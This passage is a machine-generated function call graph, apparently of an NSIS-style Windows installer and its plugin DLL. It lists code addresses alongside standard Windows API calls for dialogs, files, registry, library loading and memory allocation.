calls 4202->4212 4207 404119 19 API calls 4203->4207 4208 404165 SendMessageW 4204->4208 4229 403d8f 4204->4229 4205->4206 4209 403ca0 4206->4209 4210 403c88 ShowWindow 4206->4210 4211 403dcf SetClassLongW 4207->4211 4241 403e51 4208->4241 4213 403cc2 4209->4213 4214 403ca8 DestroyWindow 4209->4214 4210->4209 4215 40140b 2 API calls 4211->4215 4216 403e17 4212->4216 4218 403cc7 SetWindowLongW 4213->4218 4219 403cd8 4213->4219 4217 4040c3 4214->4217 4215->4202 4216->4204 4222 403e1b SendMessageW 4216->4222 4228 4040d3 ShowWindow 4217->4228 4217->4229 4218->4229 4220 403d81 4219->4220 4221 403ce4 GetDlgItem 4219->4221 4278 404180 4220->4278 4225 403d14 4221->4225 4226 403cf7 SendMessageW IsWindowEnabled 4221->4226 4222->4229 4223 40140b 2 API calls 4223->4241 4224 4040a4 DestroyWindow EndDialog 4224->4217 4231 403d21 4225->4231 4232 403d68 SendMessageW 4225->4232 4233 403d34 4225->4233 4243 403d19 4225->4243 4226->4225 4226->4229 4228->4229 4230 406077 18 API calls 4230->4241 4231->4232 4231->4243 4232->4220 4236 403d51 4233->4236 4237 403d3c 4233->4237 4235 403d4f 4235->4220 4239 40140b 2 API calls 4236->4239 4240 40140b 2 API calls 4237->4240 4238 404119 19 API calls 4238->4241 4242 403d58 4239->4242 4240->4243 4241->4223 4241->4224 4241->4229 4241->4230 4241->4238 4259 403fe4 DestroyWindow 4241->4259 4269 404119 4241->4269 4242->4220 4242->4243 4275 4040f2 4243->4275 4245 403ecc GetDlgItem 4246 403ee1 4245->4246 4247 403ee9 ShowWindow KiUserCallbackDispatcher 4245->4247 4246->4247 4272 40413b EnableWindow 4247->4272 4249 403f13 EnableWindow 4252 403f27 4249->4252 4250 403f2c GetSystemMenu EnableMenuItem SendMessageW 4251 403f5c SendMessageW 4250->4251 4250->4252 4251->4252 4252->4250 4273 40414e SendMessageW 4252->4273 4274 406055 lstrcpynW 4252->4274 4255 403f8a lstrlenW 4256 406077 18 API calls 4255->4256 4257 403fa0 SetWindowTextW 4256->4257 4258 401389 2 API calls 4257->4258 4258->4241 4259->4217 4260 403ffe CreateDialogParamW 4259->4260 4260->4217 4261 404031 4260->4261 4262 404119 19 API calls 4261->4262 4263 40403c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4262->4263 4264 401389 2 API calls 4263->4264 4265 404082 4264->4265 4265->4229 4266 40408a ShowWindow 4265->4266 4267 404165 SendMessageW 4266->4267 4268 4040a2 4267->4268 4268->4217 4270 406077 18 API calls 4269->4270 4271 404124 SetDlgItemTextW 4270->4271 4271->4245 4272->4249 4273->4252 4274->4255 4276 4040f9 4275->4276 4277 4040ff SendMessageW 4275->4277 4276->4277 4277->4235 4279 404198 GetWindowLongW 4278->4279 4289 404221 4278->4289 4280 4041a9 4279->4280 4279->4289 4281 4041b8 GetSysColor 4280->4281 4282 4041bb 4280->4282 4281->4282 4283 4041c1 SetTextColor 4282->4283 4284 4041cb SetBkMode 4282->4284 4283->4284 4285 4041e3 GetSysColor 4284->4285 4286 4041e9 4284->4286 4285->4286 4287 4041f0 SetBkColor 4286->4287 4288 4041fa 4286->4288 4287->4288 4288->4289 4290 404214 CreateBrushIndirect 4288->4290 4291 40420d DeleteObject 4288->4291 4289->4229 4290->4289 4291->4290 4292 401fc3 4293 401fd5 4292->4293 4302 402087 4292->4302 4315 402bbf 4293->4315 4295 401423 25 API calls 4303 4021e1 4295->4303 4297 402bbf 18 API calls 4298 401fe5 4297->4298 4299 401ffb LoadLibraryExW 4298->4299 4300 401fed GetModuleHandleW 4298->4300 4301 40200c 4299->4301 4299->4302 4300->4299 4300->4301 4321 40649a WideCharToMultiByte 4301->4321 4302->4295 4306 402056 4310 4051b4 25 API calls 4306->4310 4307 40201d 4308 402025 4307->4308 4309 40203c 4307->4309 4366 401423 4308->4366 4324 10001759 4309->4324 4312 40202d 4310->4312 4312->4303 4313 402079 FreeLibrary 4312->4313 4313->4303 4316 402bcb 4315->4316 4317 406077 18 API calls 4316->4317 4318 402bec 4317->4318 4319 401fdc 4318->4319 4320 4062e9 5 API calls 4318->4320 4319->4297 4320->4319 4322 4064c4 GetProcAddress 4321->4322 4323 402017 4321->4323 4322->4323 4323->4306 4323->4307 4325 10001789 4324->4325 4369 10001b18 4325->4369 4327 10001790 4328 100018a6 4327->4328 4329 100017a1 4327->4329 4330 100017a8 4327->4330 4328->4312 4418 10002286 4329->4418 4401 100022d0 4330->4401 4335 1000180c 4341 10001812 4335->4341 4342 1000184e 4335->4342 4336 100017ee 4431 100024a9 4336->4431 4337 100017d7 4350 100017cd 4337->4350 4428 10002b5f 4337->4428 4338 100017be 4340 100017c4 4338->4340 4344 100017cf 4338->4344 4340->4350 4412 100028a4 4340->4412 4346 100015b4 3 API calls 4341->4346 4348 100024a9 10 API calls 4342->4348 4343 100017f4 4442 100015b4 4343->4442 4422 10002645 4344->4422 4352 10001828 4346->4352 4353 10001840 4348->4353 4350->4335 4350->4336 4356 100024a9 10 API calls 4352->4356 4357 10001895 4353->4357 4453 1000246c 4353->4453 4355 100017d5 4355->4350 4356->4353 4357->4328 4361 1000189f GlobalFree 4357->4361 4361->4328 4363 10001881 4363->4357 4457 1000153d wsprintfW 4363->4457 4364 1000187a FreeLibrary 4364->4363 4367 4051b4 25 API calls 4366->4367 4368 401431 4367->4368 4368->4312 4460 1000121b GlobalAlloc 4369->4460 4371 10001b3c 4461 1000121b GlobalAlloc 4371->4461 4373 10001d7a GlobalFree GlobalFree GlobalFree 4374 10001d97 4373->4374 4391 10001de1 4373->4391 4375 100020ee 4374->4375 4383 10001dac 4374->4383 4374->4391 4377 10002110 GetModuleHandleW 4375->4377 4375->4391 4376 10001c1d GlobalAlloc 4394 10001b47 4376->4394 4379 10002121 LoadLibraryW 4377->4379 4380 10002136 4377->4380 4378 10001c86 GlobalFree 4378->4394 4379->4380 4379->4391 4468 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4380->4468 4381 10001c68 lstrcpyW 4384 10001c72 lstrcpyW 4381->4384 4383->4391 4464 1000122c 4383->4464 4384->4394 4385 10002188 4387 10002195 lstrlenW 4385->4387 4385->4391 4386 10002048 4386->4391 4395 10002090 lstrcpyW 4386->4395 4469 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4387->4469 4391->4327 4392 10002148 4392->4385 4400 10002172 GetProcAddress 4392->4400 4393 100021af 4393->4391 4394->4373 4394->4376 4394->4378 4394->4381 4394->4384 4394->4386 4394->4391 4396 10001cc4 4394->4396 4397 10001f37 GlobalFree 4394->4397 4399 1000122c 2 API calls 4394->4399 4467 1000121b GlobalAlloc 4394->4467 4395->4391 4396->4394 4462 1000158f GlobalSize GlobalAlloc 4396->4462 4397->4394 4399->4394 4400->4385 4408 100022e8 4401->4408 4403 10002415 GlobalFree 4407 100017ae 4403->4407 4403->4408 4404 100023d3 lstrlenW 4404->4403 4411 100023de 4404->4411 4405 100023ba GlobalAlloc CLSIDFromString 4405->4403 4406 1000238f GlobalAlloc WideCharToMultiByte 4406->4403 4407->4337 4407->4338 4407->4350 4408->4403 4408->4404 4408->4405 4408->4406 4409 1000122c GlobalAlloc lstrcpynW 4408->4409 4471 100012ba 4408->4471 4409->4408 4411->4403 4475 100025d9 4411->4475 4414 100028b6 4412->4414 4413 1000295b VirtualAlloc 4415 10002979 4413->4415 4414->4413 4416 10002a75 4415->4416 4417 10002a6a GetLastError 4415->4417 4416->4350 4417->4416 4419 10002296 4418->4419 4420 100017a7 4418->4420 4419->4420 4421 100022a8 GlobalAlloc 4419->4421 4420->4330 4421->4419 4426 10002661 4422->4426 4423 100026b2 GlobalAlloc 4427 100026d4 4423->4427 4424 100026c5 4425 100026ca GlobalSize 4424->4425 4424->4427 4425->4427 4426->4423 4426->4424 4427->4355 4430 10002b6a 4428->4430 4429 10002baa GlobalFree 4430->4429 4478 1000121b GlobalAlloc 4431->4478 4433 10002530 StringFromGUID2 4439 100024b3 4433->4439 4434 10002541 lstrcpynW 4434->4439 4435 1000250b MultiByteToWideChar 4435->4439 4436 10002571 GlobalFree 4436->4439 4437 10002554 wsprintfW 4437->4439 4438 100025ac GlobalFree 4438->4343 4439->4433 4439->4434 4439->4435 4439->4436 4439->4437 4439->4438 4440 10001272 2 API calls 4439->4440 4479 100012e1 4439->4479 4440->4439 4483 1000121b GlobalAlloc 4442->4483 4444 100015ba 4445 100015c7 lstrcpyW 4444->4445 4447 100015e1 4444->4447 4448 100015fb 4445->4448 4447->4448 4449 100015e6 wsprintfW 4447->4449 4450 10001272 4448->4450 4449->4448 4451 100012b5 GlobalFree 4450->4451 4452 1000127b GlobalAlloc lstrcpynW 4450->4452 4451->4353 4452->4451 4454 1000247a 4453->4454 4455 10001861 4453->4455 4454->4455 4456 10002496 GlobalFree 4454->4456 4455->4363 4455->4364 4456->4454 4458 10001272 2 API calls 4457->4458 4459 1000155e 4458->4459 4459->4357 4460->4371 4461->4394 4463 100015ad 4462->4463 4463->4396 4470 1000121b GlobalAlloc 4464->4470 4466 1000123b lstrcpynW 4466->4391 4467->4394 4468->4392 4469->4393 4470->4466 4472 100012c1 4471->4472 4473 1000122c 2 API calls 4472->4473 4474 100012df 4473->4474 4474->4408 4476 100025e7 VirtualAlloc 4475->4476 4477 1000263d 4475->4477 4476->4477 4477->4411 4478->4439 4480 100012ea 4479->4480 4481 1000130c 4479->4481 4480->4481 4482 100012f0 lstrcpyW 4480->4482 4481->4439 4482->4481 4483->4444 4837 4016c4 4838 402bbf 18 API calls 4837->4838 4839 4016ca GetFullPathNameW 4838->4839 4840 4016e4 4839->4840 4841 401706 4839->4841 4840->4841 4844 406398 2 API calls 4840->4844 4842 40171b GetShortPathNameW 4841->4842 4843 402a4c 4841->4843 4842->4843 4845 4016f6 4844->4845 4845->4841 4847 406055 lstrcpynW 4845->4847 4847->4841 4848 4014cb 4849 4051b4 25 API calls 4848->4849 4850 4014d2 4849->4850 4851 40194e 4852 402bbf 18 API calls 4851->4852 4853 401955 lstrlenW 4852->4853 4854 402531 4853->4854 4855 4027ce 4856 4027d6 4855->4856 4857 4027da FindNextFileW 4856->4857 4860 4027ec 4856->4860 4858 402833 4857->4858 4857->4860 4861 406055 lstrcpynW 4858->4861 4861->4860 4681 401754 4682 402bbf 18 API calls 4681->4682 4683 40175b 4682->4683 4684 405c59 2 API calls 4683->4684 4685 401762 4684->4685 4686 405c59 2 API calls 4685->4686 4686->4685 4862 401d56 GetDC GetDeviceCaps 4863 402ba2 18 API calls 4862->4863 4864 401d74 MulDiv ReleaseDC 4863->4864 4865 402ba2 18 API calls 4864->4865 4866 401d93 4865->4866 4867 406077 18 API calls 4866->4867 4868 401dcc CreateFontIndirectW 4867->4868 4869 402531 4868->4869 4870 401a57 4871 402ba2 18 API calls 4870->4871 4872 401a5d 4871->4872 4873 402ba2 18 API calls 4872->4873 4874 401a05 4873->4874 4875 4014d7 4876 402ba2 18 API calls 4875->4876 4877 4014dd Sleep 4876->4877 4879 402a4c 4877->4879 4880 40155b 4881 4029f2 4880->4881 4884 405f9c wsprintfW 4881->4884 4883 4029f7 4884->4883 4760 401ddc 4761 402ba2 18 API calls 4760->4761 4762 401de2 4761->4762 4763 402ba2 18 API calls 4762->4763 4764 401deb 4763->4764 4765 401df2 ShowWindow 4764->4765 4766 401dfd EnableWindow 4764->4766 4767 402a4c 4765->4767 4766->4767 4885 40385c 4886 403867 4885->4886 4887 40386b 4886->4887 4888 40386e GlobalAlloc 4886->4888 4888->4887 4889 4022df 4890 402bbf 18 API calls 4889->4890 4891 4022ee 4890->4891 4892 402bbf 18 API calls 4891->4892 4893 4022f7 4892->4893 4894 402bbf 18 API calls 4893->4894 4895 402301 GetPrivateProfileStringW 4894->4895 4896 401bdf 4897 402ba2 18 API calls 4896->4897 4898 401be6 4897->4898 4899 402ba2 18 API calls 4898->4899 4900 401bf0 4899->4900 4901 401c00 4900->4901 4903 402bbf 18 API calls 4900->4903 4902 401c10 4901->4902 4904 402bbf 18 API calls 4901->4904 4905 401c1b 4902->4905 4906 401c5f 4902->4906 4903->4901 4904->4902 4907 402ba2 18 API calls 4905->4907 4908 402bbf 18 API calls 4906->4908 4909 401c20 4907->4909 4910 401c64 4908->4910 4912 402ba2 18 API calls 4909->4912 4911 402bbf 18 API calls 4910->4911 4913 401c6d FindWindowExW 4911->4913 4914 401c29 4912->4914 4917 401c8f 4913->4917 4915 401c31 SendMessageTimeoutW 4914->4915 4916 401c4f SendMessageW 4914->4916 4915->4917 4916->4917 4918 401960 4919 402ba2 18 API calls 4918->4919 4920 401967 4919->4920 4921 402ba2 18 API calls 4920->4921 4922 401971 4921->4922 4923 402bbf 18 API calls 4922->4923 4924 40197a 4923->4924 4925 40198e lstrlenW 4924->4925 4926 4019ca 4924->4926 4927 401998 4925->4927 4927->4926 4931 406055 lstrcpynW 4927->4931 4929 4019b3 4929->4926 4930 4019c0 lstrlenW 4929->4930 4930->4926 4931->4929 4932 401662 4933 402bbf 18 API calls 4932->4933 4934 401668 4933->4934 4935 406398 2 API calls 4934->4935 4936 40166e 4935->4936 4937 4019e4 4938 402bbf 18 API calls 4937->4938 4939 4019eb 4938->4939 4940 402bbf 18 API calls 4939->4940 4941 4019f4 4940->4941 4942 4019fb lstrcmpiW 4941->4942 4943 401a0d lstrcmpW 4941->4943 4944 401a01 4942->4944 4943->4944 4484 4025e5 4498 402ba2 4484->4498 4486 40263a ReadFile 4493 4025f4 4486->4493 4497 40272d 4486->4497 4487 4026d3 4487->4493 4487->4497 4501 405d0b SetFilePointer 4487->4501 4488 405cad ReadFile 4488->4493 4490 40267a MultiByteToWideChar 4490->4493 4491 40272f 4510 405f9c wsprintfW 4491->4510 4493->4486 4493->4487 4493->4488 4493->4490 4493->4491 4494 4026a0 SetFilePointer MultiByteToWideChar 4493->4494 4495 402740 4493->4495 4493->4497 4494->4493 4496 402761 SetFilePointer 4495->4496 4495->4497 4496->4497 4499 406077 18 API calls 4498->4499 4500 402bb6 4499->4500 4500->4493 4502 405d27 4501->4502 4504 405d43 4501->4504 4503 405cad ReadFile 4502->4503 4505 405d33 4503->4505 4504->4487 4505->4504 4506 405d74 SetFilePointer 4505->4506 4507 405d4c SetFilePointer 4505->4507 4506->4504 4507->4506 4508 405d57 4507->4508 4509 405cdc WriteFile 4508->4509 4509->4504 4510->4497 4945 401e66 4946 402bbf 18 API calls 4945->4946 4947 401e6c 4946->4947 4948 4051b4 25 API calls 4947->4948 4949 401e76 4948->4949 4950 405735 2 API calls 4949->4950 4951 401e7c 4950->4951 4952 401edb CloseHandle 4951->4952 4953 401e8c WaitForSingleObject 4951->4953 4954 40281e 4951->4954 4952->4954 4955 401e9e 4953->4955 4956 401eb0 GetExitCodeProcess 4955->4956 4957 406467 2 API calls 4955->4957 4958 401ec2 4956->4958 4959 401ecd 4956->4959 4960 401ea5 WaitForSingleObject 4957->4960 4962 405f9c wsprintfW 4958->4962 4959->4952 4960->4955 4962->4959 4520 401767 4521 402bbf 18 API calls 4520->4521 4522 40176e 4521->4522 4523 401796 4522->4523 4524 40178e 4522->4524 4561 406055 lstrcpynW 4523->4561 4560 406055 lstrcpynW 4524->4560 4527 401794 4530 4062e9 5 API calls 4527->4530 4528 4017a1 4529 405a09 3 API calls 4528->4529 4531 4017a7 lstrcatW 4529->4531 4539 4017b3 4530->4539 4531->4527 4532 406398 2 API calls 4532->4539 4533 4017ef 4534 405c05 2 API calls 4533->4534 4534->4539 4536 4017c5 CompareFileTime 4536->4539 4537 401885 4538 4051b4 25 API calls 4537->4538 4541 40188f 4538->4541 4539->4532 4539->4533 4539->4536 4539->4537 4540 406055 lstrcpynW 4539->4540 4546 406077 18 API calls 4539->4546 4554 40579a MessageBoxIndirectW 4539->4554 4557 40185c 4539->4557 4559 405c2a GetFileAttributesW CreateFileW 4539->4559 4540->4539 4543 403027 32 API calls 4541->4543 4542 4051b4 25 API calls 4558 401871 4542->4558 4544 4018a2 4543->4544 4545 4018b6 SetFileTime 4544->4545 4547 4018c8 CloseHandle 4544->4547 4545->4547 4546->4539 4548 4018d9 4547->4548 4547->4558 4549 4018f1 4548->4549 4550 4018de 4548->4550 4552 406077 18 API calls 4549->4552 4551 406077 18 API calls 4550->4551 4555 4018e6 lstrcatW 4551->4555 4553 4018f9 4552->4553 4556 40579a MessageBoxIndirectW 4553->4556 4554->4539 4555->4553 4556->4558 4557->4542 4557->4558 4559->4539 4560->4527 4561->4528 4963 404267 lstrlenW 4964 404286 4963->4964 4965 404288 WideCharToMultiByte 4963->4965 4964->4965 4966 401ee9 4967 402bbf 18 API calls 4966->4967 4968 401ef0 4967->4968 4969 406398 2 API calls 4968->4969 4970 401ef6 4969->4970 4971 401f07 4970->4971 4973 405f9c wsprintfW 4970->4973 4973->4971 4974 100018a9 4975 100018cc 4974->4975 4976 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4975->4976 4977 100018ff GlobalFree 4975->4977 4978 10001272 2 API calls 4976->4978 4977->4976 4979 10001a87 GlobalFree GlobalFree 4978->4979 4980 4021ea 4981 402bbf 18 API calls 4980->4981 4982 4021f0 4981->4982 4983 402bbf 18 API calls 4982->4983 4984 4021f9 4983->4984 4985 402bbf 18 API calls 4984->4985 4986 402202 4985->4986 4987 406398 2 API calls 4986->4987 4988 40220b 4987->4988 4989 40221c lstrlenW lstrlenW 4988->4989 4990 40220f 4988->4990 4992 4051b4 25 API calls 4989->4992 4991 4051b4 25 API calls 4990->4991 4994 402217 4990->4994 4991->4994 4993 40225a SHFileOperationW 4992->4993 4993->4990 4993->4994 4995 40156b 4996 401584 4995->4996 4997 40157b ShowWindow 4995->4997 4998 401592 ShowWindow 4996->4998 4999 402a4c 4996->4999 4997->4996 4998->4999 5000 40456d 5001 4045a3 5000->5001 5002 40457d 5000->5002 5004 404180 8 API calls 5001->5004 5003 404119 19 API calls 5002->5003 5005 40458a SetDlgItemTextW 5003->5005 5006 4045af 5004->5006 5005->5001 5007 40226e 5008 402275 5007->5008 5010 402288 5007->5010 5009 406077 18 API calls 5008->5009 5011 402282 5009->5011 5012 40579a MessageBoxIndirectW 5011->5012 5012->5010 5013 4014f1 SetForegroundWindow 5014 402a4c 5013->5014 5015 401673 5016 402bbf 18 API calls 5015->5016 5017 40167a 5016->5017 5018 402bbf 18 API calls 5017->5018 5019 401683 5018->5019 5020 402bbf 18 API calls 5019->5020 5021 40168c MoveFileW 5020->5021 5022 40169f 5021->5022 5028 401698 5021->5028 5024 406398 2 API calls 5022->5024 5026 4021e1 5022->5026 5023 401423 25 API calls 5023->5026 5025 4016ae 5024->5025 5025->5026 5027 405ef6 38 API calls 5025->5027 5027->5028 5028->5023 5029 4052f3 5030 405314 GetDlgItem GetDlgItem GetDlgItem 5029->5030 5031 40549d 5029->5031 5074 40414e SendMessageW 5030->5074 5033 4054a6 GetDlgItem CreateThread CloseHandle 5031->5033 5034 4054ce 5031->5034 5033->5034 5036 4054f9 5034->5036 5037 4054e5 ShowWindow ShowWindow 5034->5037 5038 40551e 5034->5038 5035 405384 5043 40538b GetClientRect GetSystemMetrics SendMessageW SendMessageW 5035->5043 5040 405533 ShowWindow 5036->5040 5041 40550d 5036->5041 5044 405559 5036->5044 5076 40414e SendMessageW 5037->5076 5042 404180 8 API calls 5038->5042 5047 405553 5040->5047 5048 405545 5040->5048 5045 4040f2 SendMessageW 5041->5045 5046 40552c 5042->5046 5049 4053f9 5043->5049 5050 4053dd SendMessageW SendMessageW 5043->5050 5044->5038 5051 405567 SendMessageW 5044->5051 5045->5038 5056 4040f2 SendMessageW 5047->5056 5055 4051b4 25 API calls 5048->5055 5052 40540c 5049->5052 5053 4053fe SendMessageW 5049->5053 5050->5049 5051->5046 5054 405580 CreatePopupMenu 5051->5054 5058 404119 19 API calls 5052->5058 5053->5052 5057 406077 18 API calls 5054->5057 5055->5047 5056->5044 5059 405590 AppendMenuW 5057->5059 5060 40541c 5058->5060 5061 4055c0 TrackPopupMenu 5059->5061 5062 4055ad GetWindowRect 5059->5062 5063 405425 ShowWindow 5060->5063 5064 405459 GetDlgItem SendMessageW 5060->5064 5061->5046 5065 4055db 5061->5065 5062->5061 5066 405448 5063->5066 5067 40543b ShowWindow 5063->5067 5064->5046 5068 405480 SendMessageW SendMessageW 5064->5068 5069 4055f7 SendMessageW 5065->5069 5075 40414e SendMessageW 5066->5075 5067->5066 5068->5046 5069->5069 5070 405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5069->5070 5072 405639 SendMessageW 5070->5072 5072->5072 5073 405662 GlobalUnlock SetClipboardData CloseClipboard 5072->5073 5073->5046 5074->5035 5075->5064 5076->5036 5077 100016b6 5078 100016e5 5077->5078 5079 10001b18 22 API calls 5078->5079 5080 100016ec 5079->5080 5081 100016f3 5080->5081 5082 100016ff 5080->5082 5083 10001272 2 API calls 5081->5083 5084 10001726 5082->5084 5085 10001709 5082->5085 5088 100016fd 5083->5088 5086 10001750 5084->5086 5087 1000172c 5084->5087 5089 1000153d 3 API calls 5085->5089 5091 1000153d 3 API calls 5086->5091 5090 100015b4 3 API calls 5087->5090 5092 1000170e 5089->5092 5093 10001731 5090->5093 5091->5088 5094 100015b4 3 API calls 5092->5094 5095 10001272 2 API calls 5093->5095 5096 10001714 5094->5096 5097 10001737 GlobalFree 5095->5097 5098 10001272 2 API calls 5096->5098 5097->5088 5099 1000174b GlobalFree 5097->5099 5100 1000171a GlobalFree 5098->5100 5099->5088 5100->5088 5101 10002238 5102 10002296 5101->5102 5104 100022cc 5101->5104 5103 100022a8 GlobalAlloc 5102->5103 5102->5104 5103->5102 5105 401cfa GetDlgItem GetClientRect 5106 402bbf 18 API calls 5105->5106 5107 401d2c LoadImageW SendMessageW 5106->5107 5108 401d4a DeleteObject 5107->5108 5109 402a4c 5107->5109 5108->5109 4729 4027fb 4730 402bbf 18 API calls 4729->4730 4731 402802 FindFirstFileW 4730->4731 4732 40282a 4731->4732 4736 402815 4731->4736 4733 402833 4732->4733 4737 405f9c wsprintfW 4732->4737 4738 406055 lstrcpynW 4733->4738 4737->4733 4738->4736 4739 40237b 4740 402381 4739->4740 4741 402bbf 18 API calls 4740->4741 4742 402393 4741->4742 4743 402bbf 18 API calls 4742->4743 4744 40239d RegCreateKeyExW 4743->4744 4745 4023c7 4744->4745 4747 40281e 4744->4747 4746 4023e2 4745->4746 4748 402bbf 18 API calls 4745->4748 4750 402ba2 18 API calls 4746->4750 4752 4023ee 4746->4752 4749 4023d8 lstrlenW 4748->4749 4749->4746 4750->4752 4751 402409 RegSetValueExW 4754 40241f RegCloseKey 4751->4754 4752->4751 4753 403027 32 API calls 4752->4753 4753->4751 4754->4747 5110 1000103d 5111 1000101b 5 API calls 5110->5111 5112 10001056 5111->5112 5113 4014ff 5114 401507 5113->5114 5116 40151a 5113->5116 5115 402ba2 18 API calls 5114->5115 5115->5116 5117 401000 5118 401037 BeginPaint GetClientRect 5117->5118 5119 40100c DefWindowProcW 5117->5119 5121 4010f3 5118->5121 5122 401179 5119->5122 5123 401073 CreateBrushIndirect FillRect DeleteObject 5121->5123 5124 4010fc 5121->5124 5123->5121 5125 401102 CreateFontIndirectW 5124->5125 5126 401167 EndPaint 5124->5126 5125->5126 5127 401112 6 API calls 5125->5127 5126->5122 5127->5126 5128 401904 5129 40193b 5128->5129 5130 402bbf 18 API calls 5129->5130 5131 401940 5130->5131 5132 405846 69 API calls 5131->5132 5133 401949 5132->5133 5134 402d04 5135 402d16 SetTimer 5134->5135 5137 402d2f 5134->5137 5135->5137 5136 402d84 5137->5136 5138 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5137->5138 5138->5136 4511 402786 4512 40278d 4511->4512 4514 4029f7 4511->4514 4513 402ba2 18 API calls 4512->4513 4515 402798 4513->4515 4516 40279f SetFilePointer 4515->4516 4516->4514 4517 4027af 4516->4517 4519 405f9c wsprintfW 4517->4519 4519->4514 4562 100027c7 4563 10002817 4562->4563 4564 100027d7 VirtualProtect 4562->4564 4564->4563 5139 401907 5140 402bbf 18 API calls 5139->5140 5141 40190e 5140->5141 5142 40579a MessageBoxIndirectW 5141->5142 5143 401917 5142->5143 5144 401e08 5145 402bbf 18 API calls 5144->5145 5146 401e0e 5145->5146 5147 402bbf 18 API calls 5146->5147 5148 401e17 5147->5148 5149 402bbf 18 API calls 5148->5149 5150 401e20 5149->5150 5151 402bbf 18 API calls 5150->5151 5152 401e29 5151->5152 5153 401423 25 API calls 5152->5153 5154 401e30 ShellExecuteW 5153->5154 5155 401e61 5154->5155 5161 40490a 5162 404936 5161->5162 5163 40491a 5161->5163 5165 404969 5162->5165 5166 40493c SHGetPathFromIDListW 5162->5166 5172 40577e GetDlgItemTextW 5163->5172 5168 404953 SendMessageW 5166->5168 5169 40494c 5166->5169 5167 404927 SendMessageW 5167->5162 5168->5165 5170 40140b 2 API calls 5169->5170 5170->5168 5172->5167 5173 1000164f 5174 10001516 GlobalFree 5173->5174 5176 10001667 5174->5176 5175 100016ad GlobalFree 5176->5175 5177 10001682 5176->5177 5178 10001699 VirtualFree 5176->5178 5177->5175 5178->5175 4687 402095 4688 402bbf 18 API calls 4687->4688 4689 40209c 4688->4689 4690 402bbf 18 API calls 4689->4690 4691 4020a6 4690->4691 4692 402bbf 18 API calls 4691->4692 4693 4020b0 4692->4693 4694 402bbf 18 API calls 4693->4694 4695 4020ba 4694->4695 4696 402bbf 18 API calls 4695->4696 4698 4020c4 4696->4698 4697 402103 CoCreateInstance 4702 402122 4697->4702 4698->4697 4699 402bbf 18 API calls 4698->4699 4699->4697 4700 401423 25 API calls 4701 4021e1 4700->4701 4702->4700 4702->4701 5179 401a15 5180 402bbf 18 API calls 5179->5180 5181 401a1e ExpandEnvironmentStringsW 5180->5181 5182 401a32 5181->5182 5184 401a45 5181->5184 5183 401a37 lstrcmpW 5182->5183 5182->5184 5183->5184 5185 402515 5186 402bbf 18 API calls 5185->5186 5187 40251c 5186->5187 5190 405c2a GetFileAttributesW CreateFileW 5187->5190 5189 402528 5189->5189 5190->5189 5191 401b16 5192 402bbf 18 API calls 5191->5192 5193 401b1d 5192->5193 5194 402ba2 18 API calls 5193->5194 5195 401b26 wsprintfW 5194->5195 5196 402a4c 5195->5196 5197 10001058 5199 10001074 5197->5199 5198 100010dd 5199->5198 5200 10001516 GlobalFree 5199->5200 5201 10001092 5199->5201 5200->5201 5202 10001516 GlobalFree 5201->5202 5203 100010a2 5202->5203 5204 100010b2 5203->5204 5205 100010a9 GlobalSize 5203->5205 5206 100010b6 GlobalAlloc 5204->5206 5207 100010c7 5204->5207 5205->5204 5208 1000153d 3 API calls 5206->5208 5209 100010d2 GlobalFree 5207->5209 5208->5207 5209->5198 4756 40159b 4757 402bbf 18 API calls 4756->4757 4758 4015a2 SetFileAttributesW 4757->4758 4759 4015b4 4758->4759 4768 40229d 4769 4022a5 4768->4769 4770 4022ab 4768->4770 4772 402bbf 18 API calls 4769->4772 4771 4022b9 4770->4771 4773 402bbf 18 API calls 4770->4773 4774 4022c7 4771->4774 4775 402bbf 18 API calls 4771->4775 4772->4770 4773->4771 4776 402bbf 18 API calls 4774->4776 4775->4774 4777 4022d0 WritePrivateProfileStringW 4776->4777 5210 401f1d 5211 402bbf 18 API calls 5210->5211 5212 401f24 5211->5212 5213 40642b 5 API calls 5212->5213 5214 401f33 5213->5214 5215 401fb7 5214->5215 5216 401f4f GlobalAlloc 5214->5216 5216->5215 5217 401f63 5216->5217 5218 40642b 5 API calls 5217->5218 5219 401f6a 5218->5219 5220 40642b 5 API calls 5219->5220 5221 401f74 5220->5221 5221->5215 5225 405f9c wsprintfW 5221->5225 5223 401fa9 5226 405f9c wsprintfW 5223->5226 5225->5223 5226->5215 5227 40149e 5228 402288 5227->5228 5229 4014ac PostQuitMessage 5227->5229 5229->5228 5230 40249e 5231 402cc9 19 API calls 5230->5231 5232 4024a8 5231->5232 5233 402ba2 18 API calls 5232->5233 5234 4024b1 5233->5234 5235 4024d5 RegEnumValueW 5234->5235 5236 4024c9 RegEnumKeyW 5234->5236 5238 40281e 5234->5238 5237 4024ee RegCloseKey 5235->5237 5235->5238 5236->5237 5237->5238 5240 40231f 5241 402324 5240->5241 5242 40234f 5240->5242 5243 402cc9 19 API calls 5241->5243 5244 402bbf 18 API calls 5242->5244 5245 40232b 5243->5245 5246 402356 5244->5246 5247 402bbf 18 API calls 5245->5247 5248 40236c 5245->5248 5251 402bff RegOpenKeyExW 5246->5251 5249 40233c RegDeleteValueW RegCloseKey 5247->5249 5249->5248 5258 402c76 5251->5258 5259 402c2a 5251->5259 5252 402c50 RegEnumKeyW 5253 402c62 RegCloseKey 5252->5253 5252->5259 5255 40642b 5 API calls 5253->5255 5254 402c87 RegCloseKey 5254->5258 5257 402c72 5255->5257 5256 402bff 5 API calls 5256->5259 5257->5258 5260 402ca2 RegDeleteKeyW 5257->5260 5258->5248 5259->5252 5259->5253 5259->5254 5259->5256 5260->5258 3715 4032a0 SetErrorMode GetVersion 3716 4032d4 3715->3716 3717 4032da 3715->3717 3718 40642b 5 API calls 3716->3718 3806 4063bf GetSystemDirectoryW 3717->3806 3718->3717 3720 4032f1 3721 4063bf 3 API calls 3720->3721 3722 4032fb 3721->3722 3723 4063bf 3 API calls 3722->3723 3724 403305 3723->3724 3809 40642b GetModuleHandleA 3724->3809 3727 40642b 5 API calls 3728 403313 #17 OleInitialize SHGetFileInfoW 3727->3728 3815 406055 lstrcpynW 3728->3815 3730 403350 GetCommandLineW 3816 406055 lstrcpynW 3730->3816 3732 403362 GetModuleHandleW 3733 40337a 3732->3733 3817 405a36 3733->3817 3736 